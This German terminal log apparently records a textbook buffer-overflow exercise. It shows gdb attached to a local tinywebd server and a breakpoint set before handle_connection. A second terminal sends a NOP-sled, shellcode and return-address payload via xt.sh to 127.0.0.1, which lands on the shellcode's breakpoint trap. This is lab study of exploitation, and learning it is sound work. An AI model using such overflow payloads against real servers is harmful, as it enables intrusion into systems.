root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2958  0.0  0.0   2180   368 ?        Ss   18:37   0:00 ./tinywebd
root      2960  0.0  0.0   5924   840 pts/3    S+   18:38   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -pid=2958 --symbols=./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
Attaching to process 2958
Load new symbol table from "/home/tomovic/Dokumente/hack/tinywebd"? (y or n) n
Nicht bestätigt.
(gdb) x/5i main+533
   0x8048f5c <main+533>: inc    %esp
   0x8048f5d <main+534>: and    $0x8,%al
   0x8048f5f <main+536>: lea    0x28(%esp),%eax
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
(gdb)

Wo ist die Call-Adresse? Bei `x/5i main+533` ist sie nicht zu sehen, weil main+533 offenbar keine Instruktionsgrenze ist: die ersten beiden Zeilen (`inc %esp`, `and $0x8,%al`) sind Fehl-Dekodierungen bis zur echten Grenze bei main+536, danach stimmt die Ausgabe wieder mit der von main+540 überein; dort erscheint das `call handle_connection` bei 0x8048f6e.

 

 

(gdb) x/5i main+540
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
   0x8048f6b <main+548>: mov    %eax,(%esp)
   0x8048f6e <main+551>: call   0x8048f75 <handle_connection>
   0x8048f73 <main+556>: jmp    0x8048f1a <main+467>
(gdb) break *0x8048f6e
Haltepunkt 1 at 0x8048f6e: file tinywebd.c, line 72.
(gdb) cont
Continuing.

Seite 376:

Breakpoint 1, 0x08048f6e in main () at tinywebd.c:72
72       handle_connection(new_sockfd, &client_addr, logfd);
(gdb) i r esp ebx ebp
esp            0xbffff6d0 0xbffff6d0
ebx            0xb7fc5000 -1208201216
ebp            0xbffff728 0xbffff728
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff643 in ?? ()
(gdb) i r esp ebx ebp
esp            0xbffff6d0 0xbffff6d0
ebx            0x6 6
ebp            0xbffff524 0xbffff524
(gdb) x/5i main
   0x8048d47 <main>: push   %ebp
   0x8048d48 <main+1>: mov    %esp,%ebp
   0x8048d4a <main+3>: and    $0xfffffff0,%esp
   0x8048d4d <main+6>: sub    $0x50,%esp
   0x8048d50 <main+9>: movl   $0x1,0x48(%esp)
(gdb) x/5i main+540
   0x8048f63 <main+540>: mov    %eax,0x4(%esp)
   0x8048f67 <main+544>: mov    0x4c(%esp),%eax
   0x8048f6b <main+548>: mov    %eax,(%esp)
   0x8048f6e <main+551>: call   0x8048f75 <handle_connection>
   0x8048f73 <main+556>: jmp    0x8048f1a <main+467>

Das andere Terminal:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark_break.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt.sh mark_break 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_break (44 bytes)
[NOP (356 bytes)] [shellcode (44 bytes)] [ret addr (128 bytes)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   
